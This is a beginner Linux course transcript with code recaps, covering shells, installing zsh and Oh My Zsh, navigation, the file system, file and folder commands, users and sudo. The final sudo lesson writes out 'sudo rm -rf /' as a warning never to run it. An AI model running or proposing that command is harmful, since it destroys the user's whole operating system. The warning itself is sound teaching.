All right, so you know what the terminal is. Now let's focus on understanding exactly what the shell is, because people often use these two words, terminal and shell, as if they're the same thing, and if you do, that's fine, but it's very important that you understand the actual difference between them. That's what we're going to focus on in this section. You'll also see how we're going to switch from bash to zsh, and the different shells available in a Linux environment. So, without further ado, let's kick off.

In this section, let's focus on understanding what the shell is, and we'll also change the default shell we have to a better one. In a nutshell, a shell is a program for interacting with the operating system. You've seen that we have the terminal, and the terminal is just an application that allows users to input commands to the shell and receive text-based output from the shell's operations. The shell is what actually takes the commands themselves and executes them against the operating system. Let me give you a quick demo. Let me open the terminal: the terminal is responsible for taking the input; it lets you create multiple tabs, expand the window, open a new tab, and so on. That's the terminal. But whenever I type a command, for example touch, the command you saw on the slide, followed by Desktop/foobar.txt (don't worry too much about this command, you'll learn how it works), I'm passing this command through the terminal. The terminal is responsible for taking the command and for displaying the results of commands executed by the shell, and the shell is what interacts with the operating system. If I press Enter, you can see that we have the file, foobar.txt. The same with rm: if I go back and run rm on that file and press Enter, the file is gone. Again, don't worry too much about these commands, you'll learn all of them later, but this is the concept of terminals and shells.
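The demo in one place. The point is that the terminal merely forwards these lines, while the shell interprets them and asks the operating system to do the work:

```bash
whoami                   # print the user you are logged in as
touch Desktop/foobar.txt # the shell asks the OS to create this empty file
rm Desktop/foobar.txt    # ...and to remove it again
```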
Now, I said shells, plural, because there's a bunch of different shells that you can use with Linux. You have bash (Bourne Again SHell), one of the most widely used shells and the default on many Linux distributions. We have zsh, the one we're going to switch to in a second; it's highly customizable and offers advanced features like autocompletion, spelling correction, and a powerful plugin system. Then you have fish, and many others. Cool, this is pretty much the gist of shells. Next, let's go ahead and understand, customize, and change shells; basically, learn what you need to know about them.

Cool, so you know that the shell is what takes the commands and executes them, and the terminal is just the graphical user interface: you saw iTerm, the macOS Terminal, and the command line for Windows. The shell itself is the command line interpreter; shell and command line interpreter are the exact same thing. What I want to show you here is how you view the available shells that you have installed, and also how we're able to change the current shell. Let's type together: if your prompt shows tilde and then Desktop (I think we ran the cd command before), just type cd so that you have the exact same screen as mine. You'll have something like the server name plus the user; mine is just amigoscode@amigoscode. At this point, let's type cat (you'll learn about the cat command later), then /etc/, and remember Tab: I'm going to press Tab, have a look, if I type e and press Tab I get autocompletion. Now type sh and press Tab again; you see we have shadow, shadow-, and shells. So: shells. Let me press Ctrl+L and run this command: cat /etc/shells.

All right, cool. These are the available shells we can use; I think these are the defaults that come with Ubuntu. If I take the exact same command, cat /etc/shells, and run it on my macOS (the same command, it just looks a little different), press Enter, and have a look: we have bash, csh, dash, ksh, tcsh, and zsh. I'll show you how to use that last one later. If you want to know the current shell, the one you are using right now, you can type this command: echo, then dollar sign, then SHELL, all caps. We'll go over the echo command as well as the dollar sign later, but for now this is the command to run, and it tells you the current shell you are using. In my case, it's zsh. If we take the exact same command and run it within Ubuntu, echo $SHELL, you can see that the default shell for Ubuntu is bash. Cool.
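Both checks side by side:

```bash
cat /etc/shells   # list every shell installed on this machine
echo $SHELL       # show the shell you are currently using, e.g. /bin/bash
```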
Next, let's go ahead and install zsh. zsh, also called the Z shell, is an extended version of the Bourne shell with plenty of new features and support for plugins and themes. Since it's based on the same shell as bash, zsh has many of the same features, and switching over is a no-brainer; you can see here that they say many original features were added. So let's install zsh together. As you saw, the default shell for macOS is now zsh, so let's install it in our Ubuntu desktop as well. You saw the list of available shells, and that bash is the default, /bin/bash: when you run echo $SHELL, /bin/bash comes back. We want to change this to zsh, because it's an improvement on top of bash.

First, press Ctrl+L to clear the screen. To install zsh we say sudo apt install zsh; we'll come back to sudo and to apt, which is the package manager that allows us to install software. Press Enter, and we need to enter the password for amigoscode (in your case, your own password). I'm typing, and you might think that I'm not typing anything, but I am; this input doesn't show the password, for security reasons. Press Enter, and you can see that it went off and is installing; it's waiting for us to confirm, so just say Y, wait a second, you can see the progress, and boom, this is done. To make sure it installed correctly, type zsh --version and press Enter; if you see this output, it means zsh is installed. If I clear the screen with Ctrl+L, press the Up arrow a couple of times, and list the available shells under /etc with cat again, you should now see /usr/bin/zsh as well as /bin/zsh; we'll cover the difference between /bin and /usr later, when we discuss the Linux file structure. Cool: at this point we've installed zsh, but what about using it? Let's continue in the next video.

Okey dokey. For us to use zsh, all we need to do is type zsh in the terminal and press Enter. Now the output is a little different: instead of the colored amigoscode@amigoscode, we just have amigoscode, which is the user. At this point nothing else changes, because, as I said, zsh is built on top of bash, so all the commands we execute work the same. For example, the ls command you ran before: if I press Enter, it works. The output isn't colored like before, but I'll show you later what to install to improve the experience of using zsh. And to be honest, that's it. If you want to switch back to bash, just type bash, and now we are back in bash. In fact, let's run zsh once more, and now, I was going to search my history for the echo command, but that won't actually work, because we're within a different shell; so let's not be lazy and just type it: echo $SHELL. I was expecting it to say zsh, but it doesn't, and the reason is that zsh is currently not the default shell. That means if I open a new tab and type echo $SHELL, you can see that it's bash. Cool, so let me close this: you've just seen that if you want to go back to bash, you just type bash.
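Installing and trying zsh, step by step:

```bash
sudo apt install zsh   # install zsh via the apt package manager (asks for your password)
zsh --version          # verify the install worked
zsh                    # start zsh inside the current terminal session
bash                   # ...and this drops you back into bash
```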
Also, if I run cat /etc/shells and press Enter, we have all the shells: dash and sh, for example. Let's type sh; now we've switched from bash to sh, boom, yet another shell. If I want to use dash, that's another shell. rbash, there we go. And bash and zsh. This is pretty much how you switch between shells.

But what I really want to do is switch my default shell to zsh, and the way to do it is with this command: chsh with the -s option, pointing at the shell itself, /usr/bin/zsh. So: chsh -s /usr/bin/zsh (note it's USR, not "user", my bad), press Enter, and add the password. Cool. Now let me show you something: if I open a new shell with Ctrl+Shift+T, have a look, this is still bash, and I know because if I type echo $SHELL and press Enter, it still says bash. So let me come out of this with Ctrl+D, and let's just reboot: type reboot and press Enter.

Now let me log in, and if I open the terminal, you can see that the first thing we are prompted with is to configure zsh. Let me press Ctrl and minus so you can see everything; there we go. This is the Z shell configuration function for new users; you are seeing this message because you have no zsh startup files, which are the files it needs for configuring zsh. It says you can quit and do nothing, exit while creating the file, continue to the main menu, or populate your .zshrc with the recommended configuration, which is exactly what we're going to do. So, "type one of the keys in parentheses": we want 2, and there we go. This has now created a file called .zshrc, and I'll show you that in a second. From this point onwards we have successfully installed zsh, and it is now the default shell. If I clear the screen, press Ctrl+0 to reset the font, and open a new shell with Ctrl+Shift+T, have a look: this is no longer bash. Type echo $SHELL and press Enter; have a look, zsh. In our previous tab as well, type the same command, echo $SHELL, and you can see that it's now zsh. Awesome, we have successfully switched to zsh, and we have a better shell from now on.
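The switch, condensed:

```bash
cat /etc/shells        # confirm /usr/bin/zsh is now listed
chsh -s /usr/bin/zsh   # make zsh your login shell (asks for your password)
reboot                 # log back in afterwards...
echo $SHELL            # ...and this should now print /usr/bin/zsh
```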
The last thing that I want to do in this section is unleash the terminal like never before with Oh My Zsh, which is a delightful, open-source, community-driven framework for managing your zsh configuration. It comes bundled with thousands of helpful functions, helpers, plugins, and themes; you've got all the batteries included. You can see here on the left that you can customize your theme and make it powerful and beautiful, and a bunch of other things that will make you look like a professional. If I scroll down you can read more about it, and they've got many plugins. You can see it on GitHub, which is where it's hosted; in fact, if I click on this link, let's give it a star. I think I've done it before, but if not, this is the right time, because it's awesome. Here we can see all the stargazers, so let's give it one more star (if you don't have GitHub, don't worry). Let's click on this repo, or you can click on the Code tab, and if I scroll down you can see a description of what it is, how to get started, and the installation process. Have a look at this method: sh, which is a shell, remember you saw sh, and you just pass this command with curl (we'll look into curl as well). If I scroll down, you can see they talk about how to configure it: this is .zshrc, where the configuration file is, and also plugins, such as git and macOS; you can install a bunch of plugins, and also themes. They have a section on themes, so you can choose one (I'll show you in a second how to configure .zshrc), and it might look like this if you choose, for example, this theme. You can do a lot with this, and you can even choose a random theme, which is nice.

Awesome, so let's install Oh My Zsh. I can go back to the previous website, where they have an "Install oh-my-zsh now" section. Let's take this command and copy it, go to the Ubuntu desktop (I'm logged out, so let me add the password, there we go), and paste the command with Ctrl+Shift+V. Let me make the font smaller so you can see what it looks like; whoops, there we go, you can see the entire command on one line. If I press Enter, have a look, it's doing a few things: it clones Oh My Zsh and runs an install script, and, ta-da, this is now installed.
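For reference, this is the install one-liner documented on ohmyz.sh at the time of writing; always copy the current command from the official site rather than from here:

```bash
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```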
Oh My Zsh is now installed. "Before you scream Oh My Zsh!" (I actually screamed) "look over the ~/.zshrc file to select plugins, themes, and options." Also, if you look closely, if I press Ctrl+0, have a look: the prompt has changed. You have this arrow, and you have a tilde; the tilde means you are in the home folder, and we'll talk about home later. To be honest, this is pretty much it. Nice; if I open up a new tab, you can see it's already configured and zsh is installed. Next, let's look at how to configure zsh.

Cool. You saw that they said, "Before you scream Oh My Zsh, look over the .zshrc file to select plugins, themes, and other options." In order to achieve this, here's what we have to do. I'm going to clear my screen with Ctrl+L, and make sure to type cd so that we are within the same folder; just type cd, there we go. What this does is: if I say, for example, cd Desktop and press Enter, maybe you're now inside a different folder, Desktop; typing cd on its own takes you back to the home folder. (Again, we'll come back to all of these commands in a second.) So type cd, clear the screen with Ctrl+L, and type vi .zshrc. You can use Tab here: if I type .zsh and press Tab, have a look, we've got .zsh_history, .zshrc, and .zshrc.pre-oh-my-zsh; the one I want is .zshrc. Click into the terminal and press Enter, and there we go: this is the configuration for zsh. If we scroll down, you can see that a few things are commented out, and further down we have the plugins; at the moment there's only one plugin, which is git. I'll leave it up to you to configure this the way you want: you can explore themes and whatnot, configure aliases, and a bunch of other things, but this is pretty much it.

If I go back to the GitHub repository: remember, if I scroll down, they have a section on selecting a theme. Once you find a theme you like, you'll see an environment variable, all caps, looking like this, and to use a different theme you just change it to, say, agnoster. Let's try this. I think the themes are also linked somewhere; yes: "in case you did not find a suitable theme, please have a look at the wiki." If I click on this link it takes me to external themes, and have a look, this one looks quite good, oh, even this one, wow, I'm getting excited; you can see there's a bunch of themes you can use, and you just follow the instructions on how to install them.

Let's go back to the terminal. If I scroll all the way up to the top of .zshrc, have a look: the ZSH_THEME is "robbyrussell". What I want to do is the following, and here we need to be really careful and follow exactly as I say, because this is vi, and we will learn about this text editor. Type j, just j, making sure the terminal is focused, and you can see the cursor moving down; stop right here. Now type the letter y twice, yy, followed by the letter p. There we go: this duplicates the line for us.
Now I want you to type the letter i, and you can see that it now says INSERT, which means we can type in the text editor itself. Use the up arrow, and we're going to comment out this line: comment it with the pound sign (#), then go down (I'm just using the arrows here, but I'll show you a better way later), delete everything within the double quotes, and type agnoster. Now press the Escape key on your keyboard; you can see INSERT is no longer shown. Then type colon, w, q, meaning write and quit, which lets us come out of the editor. Press Enter, and that's it. Awesome. Now open a new tab, and you can see the theme looks slightly different; it's actually missing some fonts, which you'd have to install, but I'm going to leave it up to you how you customize your setup, so I'm not spending time on this. Mine is usually just plain black, so let me close this and go back to vi: I'll press the up arrow, Ctrl+L, you can see the command once more, Enter. What we're going to do is the following: press d twice, dd, making sure the cursor is on this line, and it's gone; dd deletes the line. Then press i for insert, tidy that up, and Escape, :wq. (I'll leave instructions on how to work with Vim, and I'll teach you Vim properly later on.) Press Enter, and now if I open a new tab, you can see we have the default theme. Cool. Ctrl+0 for the default font size, Ctrl+L, and this is pretty much it. I'll leave some links under the description of this video so you can explore and adventure on your own in customizing your setup. If I quickly show you mine on macOS, it looks like this: plain black, no themes whatsoever. Let me type vi .zshrc: this is the exact same configuration, and if I put this full screen, have a look, the exact same thing; I didn't change anything, and you can add plugins and whatnot, so I'll leave that up to you. Cool, so Escape, :wq (this time I didn't change the file), press Enter. This is pretty much it; catch me on the next video.
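After the edit (and before reverting it), the relevant lines of ~/.zshrc looked roughly like this. The exact contents come from the Oh My Zsh template, so treat this as an illustrative excerpt:

```bash
# ~/.zshrc (excerpt)
# ZSH_THEME="robbyrussell"   # the default theme, duplicated and commented out
ZSH_THEME="agnoster"         # the duplicate, switched to the agnoster theme

plugins=(git)                # only the git plugin is enabled out of the box
```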
Let us now focus on Linux commands, because moving forward we're going to learn a bunch of commands, which essentially is what Linux is all about: learning the commands that allow us to interact with the operating system. A Linux command is a text instruction that tells the operating system what to do. These commands are entered in the terminal, the command line, or basically the CLI, and by now you should be familiar with the terminal. We pass those commands, and an instruction is sent to the operating system: maybe you want to create a file, delete a file, check the time, or connect to a remote server. The commands themselves are case sensitive; for example, ls and LS in capitals are two different commands. Linux commands often vary in options and arguments that can modify their behavior, allowing for a wide range of functionality. In this example we have the command, option, and argument: ls is the command; then we can pass an optional flag, -a; and then an argument, which here is the dot, meaning the current directory. Here are some basic commands: ls for listing files, cd for changing directories, mkdir for creating a new directory, rm for removing files, cp for copying files, and many more. Each of these commands has instructions via the manual, so if you don't know how to use a command, you can read the instructions or a guide on how to use it effectively. Let's go ahead and learn about commands.

Here I have the terminal open, and I want to give you a quick introduction to commands. Throughout this course you've actually already seen some of the commands I've been using, for example ls, which you saw me type a couple of times, mkdir, and I think sleep. All of these are commands that let us interact with the underlying operating system. Let me quickly show you the ls command; then we'll go over the command itself, the options, and the arguments, and I'll also show you the list of all available commands, as well as aliases and the manual, the man pages. You can literally type ls anywhere, but in case you are within a different folder, let's make sure we're in the same folder together: type cd. cd is a command; press Enter, and it takes you to the home folder. cd stands for change directory, so that's one command, and changing directory means changing the directory that subsequent commands will be run from. Now let's type ls; the ls command will run under this home folder (we'll come back to the tilde and the home folder as well). Press Enter, and you can see we have Desktop, Music, Templates, Documents, Pictures, Videos, Downloads, and Public; these are currently folders.

But I know there's more inside this folder. If we type pwd, another command, which we'll come back to in a second, it stands for present working directory, and it tells me I'm under /home/amigoscode, the folder I'm currently in. So we just ran ls under this folder and got these contents. Now, I know for a fact there's more stuff under the home folder. This is home, meaning that if I say echo, yet another command, and echo takes an argument, I can pass it $HOME, which is actually an environment variable (we'll cover environment variables later). So echo is the command and $HOME is the argument; in the case of pwd we executed the command with no arguments and no options, and the same goes for ls and cd. If I press Enter, this gives me the home location, which is /home plus the user itself.
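To recap the anatomy from the slide:

```bash
ls -a .
# ls  -> the command (list directory contents)
# -a  -> an option, modifying the command's behavior (include hidden entries)
# .   -> an argument (what to list; "." means the current directory)
```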
Cool, so back to ls. Let me clear the screen with Ctrl+L. If I type ls, you can see Desktop, Music, Templates, and so on, but I know for a fact there's more content inside the home folder. So let's type ls -a; the -a is an option. If I press Enter, have a look, now we get more stuff. If I scroll up, these are all the files: .bash_history, the .cache, .config; then, scrolling down, we see Desktop, Documents, Downloads as before, but now we are also including the hidden files. What do I mean by hidden? If I open Files, this is home; have a look, under home I see Documents, Downloads, Music, Pictures, Public, Templates, and Videos, and that's all I see. Let me put the windows side by side, make the font a little smaller, Ctrl+L, and if I type ls without the -a option, what we see is Desktop, Music, Templates: basically everything the file manager shows. But through the terminal, with ls -a, we have a bunch more. In the file manager I can click on the three lines at the top and choose Show Hidden Files, and now can you see .bash_history, .profile, .viminfo, .zshrc? Remember that file? These are hidden files: you saw that by default they don't come up, but we can toggle them, and that's the -a; -a means include hidden files.

Before we move on to the next video, one more thing I want to show you. We could say ls followed by a dot: the dot means the current directory, and it's actually optional with the ls command. If I type pwd again, present working directory, we are within /home/amigoscode, the home folder, which is the one you see here. So ls . is the exact same thing as ls; Ctrl+C, let me type ls . and you can see it's the exact same thing. And what we did before was ls -a .: the command itself, the option, and the argument. If I press Enter, you can see we get the exact same output.

Now, about that argument: with ls -a . we are listing the contents of the present working directory, which is home. But say we look inside Documents: let's go to Documents in the file manager, right-click, New Folder, call it foo, press Enter, then create another folder called bar. Now within Documents we have foo and bar, two directories. Cool. Ctrl+C, and I'll type ls: you can see Desktop and Documents. What we can do is say ls with an argument: we want to list the contents of the folder called Documents, making sure it's a capital D, the exact same name (I can press Tab to autocomplete). Press Enter, and have a look, we see foo and bar, the two folders within Documents. So this is the command and this is the argument. We could also say ls -a Documents, press Enter, and we just see bar and foo; there are no hidden files within the Documents folder.
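The ls variations from this video, in one place:

```bash
ls               # contents of the current directory
ls -a            # same, plus hidden entries (names starting with ".")
ls .             # "." is the current directory, so identical to plain ls
ls -a .          # command + option + argument, all spelled out
ls Documents     # list a different folder by passing it as the argument
ls -a Documents  # ...including any hidden files inside it
```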
through with you in this course but you should   know what a command is what are options and also  what are arguments in here so here there’s just   one argument but some commands might have multiple  arguments and also I actually forgot so remember   I said that commands they are case sensitive so  LS in here so if I type this command basically   command not found so this command is not the same  as LS in lowercase cool now that you know about   commands options and arguments next let me walk  you through the manual pages or simply the man page in this section let’s focus our attention  in Le in the Linux file system which is the   hierarchical structure used to organize and manage  files and directories in a Linux operating system   it follows the tree structure with the root  directory so here you can see this is the   root at the very top and all other directories  are organized below it so here we have bin is a   directory Etc another directory sbin USR VAR dev  then we have have home lib Mount opt proc root   so on and so forth so in this section basically  I want to give you the overview so that we can   start exploring and start using the CD command  PWD on all that good stuff so basically you have   the root in here and then after root you have all  the directories in here so sbin which is used for   essential user commands binaries so here bash gut  CP date Echo LS uh less kill and then basically   all of this commands are used before the USR so  here is mounted because within this USR so here   you can see that there’s also a for slash bin in  here right so these is where you find the programs   right so binaries are programs then you have Etc  so here it’s mainly used to store configuration   files for the system so here you can see fonts  Chown tabs in it and profile uh shells time zone   and whatnot so these are mainly for configuration  files then we have the sbin so sbin is similar to   bin but only for the super user then we have  USR or you can say user so here it’s read only   application support data and binary so you can  see binaries in here for SL include in here lib   right so here basically some code and packages and  also uh you can see some local software which is   stored as well under for SL looc you also have  the for/ share which is static data across all   architectures then we have the VAR so this was  initially uh named as variable because it was   used to store data that change frequently so here  you can see uh youve got cache so application   cache data lib data modified as program runs  lock for lock files to track resources in use   then log files are stored in here variable data  for installed packages and opt es poool tasks   waiting to be processed here you’ve got es poool  and then cron cups and mail and basically here   is where you store temporary data so once the  system reboots then the data is gone you have   Dev in here so this is for device files then we  have for slome so this is the home directory and   we’ll come back to this in a second you have lib  so here for libraries and carel modules Mount so   here Mount files for temporary file systems  such as USB then we have opt for optional   software applications proc for process and kernel  information files for/ root so this is the Home D   for the root user and this is pretty much it now  obviously here I’ve schemed through it and um as   you go through your journey in terms of learning  Linux and um using the command and navigating your   way around and even you know building software  
Obviously I've skimmed through it, but as you go on your journey of learning Linux, using the commands, navigating your way around, and even building software, you'll start to familiarize yourself with all of these folders I've just talked about. This layout actually comes from the Linux Foundation; I'll leave a link where you can read in more detail about what each of these folders and subfolders does. But this is pretty much the Linux file system in a nutshell. Next, let me show you how we can navigate around it.

All right, I'm in my terminal, so let's explore the Linux file system together. I want you to type this command: cd, then space, then forward slash. Wherever you are, just type cd /. cd means change directory, and it allows us to change from one location to another. Currently I'm within the home directory, and I want to change directory into /, which is the root. Press Enter, and now we are within root; if I type pwd, it just gives us /, which means root. Nice. If I type ls, to list the contents within this directory, and press Enter: any time you see something that looks like bin, lib, proc, srv, boot, dev, etc, mnt, tmp, usr, this is the Linux file system from root. Remember, I showed you: we have root, and then bin, etc, sbin, usr, var, dev, home, lib; if I go back, have a look, bin, lib, var, tmp, usr, and so on, media, mnt, opt, and home as well. Have a look: home. So this is pretty much it.

Now, what I want to do with you is this: let me clear the screen with Ctrl+L, and let's type this command together: sudo apt install tree. We'll come back to sudo, and also to apt, in a second; this is basically a way of installing extra binaries into our operating system. Press Enter, then add the password (I'm typing, trust me, you just can't see it), press Enter, and now it's installing the tree binary. There we go. If I clear the screen and type tree, or actually, let's say which tree, press Enter, you can see that it lives under /usr/bin/tree, which means we have this binary available. Now, to this tree binary I'm going to pass an option, -L, capital L, and this option takes an argument, the depth, so: tree -L 1. Press Enter, and what this gives me is basically a nicely formatted ls: we are listing the directories within the root folder, but nicely formatted. You can see bin, boot, dev, etc, home, lib (and these arrows here, I'll come back to them in a second), tmp as well, var. This is pretty much the Linux file structure from root, and you can see there are currently 20 directories and one file; the file is this swap.img. Awesome.
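The install-and-inspect sequence, run from /:

```bash
sudo apt install tree   # install the tree binary with apt
which tree              # shows where it was installed: /usr/bin/tree
tree -L 1               # list the current directory (here /) one level deep
```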
Next, let's go ahead and learn how to use the cd command.

All right, in order to navigate around the Linux file system we need to use the cd command. Let me put this full screen and clear the screen with Ctrl+L. Type cd and press Tab: this gives me the list of all the available directories. If I want to move into the directory called tmp, for example, which is where temporary files are stored, I can just complete it and press Enter, and you can see that the prompt reflects this (that's Oh My Zsh telling me I'm within the tmp folder). If I press ls, you can see there are some files in here; these are temporary files. If I say ls -a, you also see the entries starting with a dot. And if you want more information, ls -la: anything that starts with a d (I'll come back to what all of this means in a second) is a directory, and these others are files. That means we could navigate into the snap-private-tmp or systemd folders, but I'm not going to do it; that's pretty much it.

So I'm inside the tmp folder. Let me clear the screen, and now I want to go back to the root again. How do I do that? I've got a couple of options. I can say cd /, or I can go back one folder: if I say cd .., this goes back a folder, so you see that from tmp it went back to root. If I type cd tmp again and press Enter, I can instead type cd /, which goes directly to the location rather than going back one folder; press Enter and we get the same thing. What about switching between these two folders? You don't want to keep typing cd tmp and cd ..; you can just say cd -, which flips between the previous and the current folder, going back to the previous folder wherever it is in the file system. If I press Enter, I go back to tmp; if I press cd - again, I should go back to root. Have a look, I went back to root.

Cool, I'll show you more examples of this in a second, but this is pretty much how you navigate around the Linux file system. If I type ls once more, clear the screen, Enter, you should see a bunch of folders. If you want to navigate into a particular folder, you just say cd: let's go into bin, for example, cd bin, press Enter, and now I'm within bin. If you then want to go into media, you don't necessarily have to go back a folder first; you can just say cd /media, because media is within the root. Press Enter, and now I'm in media. If I type cd -, this should take me back to (think for a second) the previous location, which was bin; press Enter, and I'm within bin. If I press the up arrow and cd - again, I should go back to media; Enter, and I'm within media. This is pretty much it; catch me on the next one.
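The navigation moves from this video, condensed:

```bash
cd /tmp    # jump straight into the temporary folder
cd ..      # go up one level, back to /
cd /tmp    # and down again
cd -       # flip back to the previous directory (/)
cd -       # ...and forward again (/tmp)
cd /media  # absolute paths work from anywhere
```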
All right, in this section let's focus our attention on working with files, and later I'll show you directories as well; then, in the next section, we'll learn about permissions. In Linux, you've seen that if I open the Files application (remember, if I click on these three lines I can show hidden files), how do we create files manually? We have two options. One: we could use the UI. Let's open any of these, say .zshrc, which brings up the text editor; here we could create a new document, type "hello Amigos", and save it, giving it a destination. Let's save it into Documents as hello.txt, and there we go; close the file, close this, and navigate to Documents: cd Documents (you've learned about the cd command), ls, and you can see that we have our file in here. But obviously that is the wrong way of doing it, so in this section we'll go through how to work with files: creating files, deleting them, and moving them to a different directory; I'll show you how to print them as well, and also how to zip any file. Cool, let's begin in the next video.

Cool. In order to create a file in Linux we have this command called touch, which allows us to create a file. Let's say touch bye.txt. If I don't specify a location and just give the name, the file will be saved in the current working directory, which is currently Documents, i.e. /home/amigoscode/Documents. Press Enter, then type ls, and you can see that we have the file bye.txt. That's how to create files. Now, obviously this file is empty; let me show you. Before I show you the Linux command for printing a file, if I open Files, navigate to Documents, we have bye.txt; open it up and you can see it's absolutely empty. So that's how to create an empty file.

Obviously that's of limited use, because most of the time we want to create a file with some content, and there are a couple of ways to do that. One way is to use the echo command: I'm going to say echo and pass it a string, for example "bye Maria", just a random string. If I press Enter, this command simply prints back "bye Maria". What I can do now is take this command and redirect its output to a file; I can give an existing file name or a brand new one. Let's just overwrite the file that we have: echo "bye Maria" > bye.txt. Press Enter, and we get nothing back; and when you see nothing on the console and the command just ran, you know that it worked. Let me clear the screen, Ctrl+L, ls: we have our bye.txt. If we want to view the contents, let's open Files again, go to Documents, bye.txt, and sure enough, we have "bye Maria". So this is how to create a file, both an empty one and one with some string or output in it: we use the echo command, pass a string, and redirect the output into the file.
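Both ways of creating a file, together:

```bash
touch bye.txt               # create an empty file in the current directory
echo "bye Maria"            # echo just prints the string back to the console
echo "bye Maria" > bye.txt  # > redirects that output into the file,
                            # overwriting whatever was there before
```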
Or, if you want an empty file, you can use the touch command with whatever name you like; you don't even need the extension: touch lol, press Enter, then ls, and you can see we have bye.txt, we have foo and bar (actually those are folders; we created them before), and lol. If I open Files once more and go to Documents, you can see the files, both with and without an extension. Cool. There's another way to create files, for when you want to type out several things before you save the content: here I'm just saying echo "bye Maria" and redirecting the output into the file, but maybe you want to write a document or a piece of code, and this approach isn't feasible for that. I'll show you later how to do it with Vim, but for now, these are the basics of creating files.

Cool. In this section let's learn how to work with folders, or directories. You saw that we can create and delete files through the terminal using commands, yet so far I've been creating folders by right-clicking and choosing New Folder, and deleting them with right-click and, I think it's, Move to Trash. There are better ways, and through the terminal we can use mkdir, which allows us to create folders or directories. Let's cd into Documents, and let me make my font a little smaller and clear the screen. If I want to create a folder, I can say mkdir hello-bar, for example; that's the name of my folder. Press Enter, and you can see that we have a folder called hello-bar. If I want to delete a folder that is empty, I can say rmdir hello-bar; this removes the folder only if it's empty. Press Enter, and the folder is no longer there.

If you want to create nested folders, you say mkdir -p and then, say, foo/bar. Press Enter; we already had a folder called foo, so it didn't create a new one, but inside foo you can now see a new folder called bar. Let me go back and run the exact same command with, for example, test/bar: now we have a folder called test, and inside test a folder called bar. If we try to delete it with rmdir test, press Enter, you can see it fails to remove test because the directory is not empty; rmdir only deletes a folder if it's empty. Remember how we delete files? We can use the rm command: rm -r, r for recursive, plus f to force-delete and skip the prompt, and then the name of the folder, test. Now, here's the key: if I say test/*, the star means pretty much "delete anything under test", and if I open test, you can see we have bar. If I press Enter, it still prompts me yes or no, so let's press n for a second; what we want is to add a trailing slash, and then it removes every single folder and subfolder without prompting. If I press Enter, the contents are gone and we kept the parent folder.

Say you want to keep the parent. Let's create folders again: mkdir -p test/bar, and also test/bar2 and test/bar3, so inside test we have three folders. To delete some of them you can use a pattern with rm -rf: let's say you want to delete anything that ends with three, so test/*3. Press Enter, and you can see that only the folder ending in 3 is gone; the star matches pretty much any name. Also, let's create a new folder inside bar2, say foo, so within bar2 we have foo (that's why I used -p, to create subfolders). If I rerun the command with test/*, it deletes all the subfolders, including folders within folders; press Enter and they're gone. We can't go back into it, because the parent, bar2, no longer exists. Let me go to Documents and test, and you can see all the folders are gone. Finally, if you want to delete everything including the parent: let's create test/bar2 with foo inside once more, and then, to delete everything including the parent folder test, you say mkdir... no, sorry, rm -rf test (or rm -fr; -rf and -fr are the same thing, I've just switched the options around). Press Enter, and the folder is now gone. This is pretty much how you create folders, and also how you delete the contents within your folders.
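The folder commands from this walkthrough:

```bash
mkdir hello-bar    # create a folder
rmdir hello-bar    # remove it; rmdir only works on empty folders
mkdir -p test/bar  # -p creates nested folders in one go
rm -rf test/*      # force-delete everything inside test, keeping test itself
rm -rf test/*3     # patterns work too: only entries ending in 3
rm -rf test        # delete test and everything in it (-fr is equivalent)
```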
Linux is a multi-user environment, which allows us to keep each user's files separate from other users'. We can add a new user with sudo useradd -m (the -m flag creates the home directory) followed by the name. We can also set the password for a particular user with passwd followed by the user in question, and if we want to switch between users, we use the su command, i.e. substitute user. If you want to delete a user, you say userdel, then some flags, and then the user in question; I'll show you the flags as well. With this, we have two types of user. A normal user can modify their own files; this user cannot make system-wide changes, install software, update system files, or change other users' files. (You've seen the sudo command throughout this course, but I haven't covered it yet; I'll show you in a second that when we try to install a package, we are not allowed to unless we use sudo.) Then we have the super user, i.e. root, who can modify any file on the system and make system-wide changes, such as installing software, and can even change files on the operating system. In this section, let's understand how all of this works, and then we'll also touch on files and permissions, which is very important: you must understand how it works, because it's key on your journey toward becoming a Linux administrator, if you want to follow that path, and for a regular software engineer it's still crucial to know, because it's key to Linux.
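A sketch of the user-management commands just listed. jamal is the example user created later in the course; the -r flag on userdel, which also removes the home directory, is my assumption for the flags mentioned above:

```bash
sudo useradd -m jamal  # create user "jamal"; -m also creates /home/jamal
sudo passwd jamal      # set (or change) jamal's password
su jamal               # substitute user: continue this session as jamal
sudo userdel -r jamal  # delete the user; -r (assumed) removes the home directory too
```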
We'll also touch on files and permissions, which is very important; you must understand how they work, because it's key to your journey toward becoming a Linux administrator, if you want to follow that path, and even for a regular software engineer it's still crucial to know, because it's key to Linux.

Cool. You've seen that if I type this command (we'll learn about package managers later), say we want to install a piece of software, basically a binary, on our machine: apt install tree. We did this before, but let's understand exactly what we had to do to install it. If I press Enter it says "could not open lock file ... permission denied", have a look, permission denied, "unable to acquire the frontend lock ... are you root?". So in order to execute this command successfully we need to execute it as root, i.e. with the sudo command. Type sudo, then two exclamation marks (!!) and press Tab; this just pulls the previous command from my terminal back in. Now if I press Enter it's actually asking me for the password. You've seen this before: it looks like I'm not typing, but trust me, it's hiding the password for security reasons, so just type your password and press Enter. In fact, if I type a wrong password and press Enter, it says the password was incorrect and I need to type it again. With the correct password it tries to install, but this dependency is already installed, as we did it before.

Similarly, if I cd / and run ls, we have a couple of folders in here, one of which is root. Try ls root, press Enter, and it says "ls: cannot open directory root: Permission denied". If we want to execute the command on this particular folder, we need to execute the exact same command as root: sudo ls root, or again type !! and Tab to bring in the previous command, a nice trick that I use all the time. Press Enter and now we're able to list the contents of the root directory. For you this might say snap, or something different, or maybe nothing, but you can see that with this command we have superpowers. Obviously you have to be really careful how you use it. Remember I said never do this: sudo rm -rf on the root of the file system, because that gets rid of your entire operating system, and you don't want that. So obviously you need to be careful who you choose to allow to have the superpowers, and I'll show you this later. This is the main idea: in a nutshell, sudo executes a given command with elevated privileges, and these privileges are required to perform certain tasks which are required by admins. Let's explore sudo even further in the next video.
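A condensed sketch of the pattern from this lesson (!! is Bash history expansion for the previous command; in the video it was typed and then expanded with Tab):

```bash
apt install tree    # fails as a normal user: "Permission denied ... are you root?"
sudo !!             # re-runs the previous command with sudo -> sudo apt install tree

ls /root            # fails: "Permission denied"
sudo ls /root       # works: lists the root user's home directory

# Never run this -- it deletes your entire operating system:
# sudo rm -rf /
```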
